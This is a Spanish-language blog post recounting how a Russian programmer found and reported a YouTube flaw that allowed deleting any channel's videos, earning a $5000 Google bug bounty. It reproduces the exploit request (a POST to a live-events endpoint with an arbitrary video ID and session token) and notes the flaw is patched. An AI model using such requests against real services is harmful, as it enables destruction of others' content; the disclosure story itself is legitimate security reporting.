Kamil Hismatullin un programador ruso dedico una mañana de sábado para descubrir algún fallo del portal youtube, dice que su inspiración era borrar los videos de canal de justin bieber, (lo dijo en broma) .
y encontró una vulnerabilidad que le permitiría borrar los vídeos de cualquier canal de youtube con una solo solicitud.
Dice que denuncio el fallo al equipo de seguridad de Google y ellos respondieron muy rápido, puesto que esta vulnerabilidad podría crear el caos total en cuestión de minutos. si esta información hubiera caído en malas manos podrían utilizar esta vulnerabilidad para extorsionar a la gente o simplemente para interrumpir el funcionamiento correcto de YouTube mediante la eliminación de grandes cantidades de videos en un muy poco tiempo.
Google le recompensado $5000 dólares y por suerte no hubieron canales de justin Bieber dañados 😀
Aqui esta un video con el ejemplo como podia borrar los videos:
- Aquí esta la pagina de la extencion que utilizo:
https://chrome.google.com/webstore/detail/postman-rest-client/fdmmgilgnpjigdojojpjoooidkmcomcm
- el código utilizado:
POST https://www.youtube.com/live_events_edit_status_ajax?action_delete_live_event=1event_id: ANY_VIDEO_ID
session_token: YOUR_TOKEN
Al hacer bien el proceso la respuesta debería ser esta: {
“success”: 1
}
De ante mano les digo que ya no funciona jejejeje ya yo lo probé y el fallo fue corregido :-p
Deja tu comentario si tu hubieras cobrado 5000 dolares mas por alertar de este fallo a google.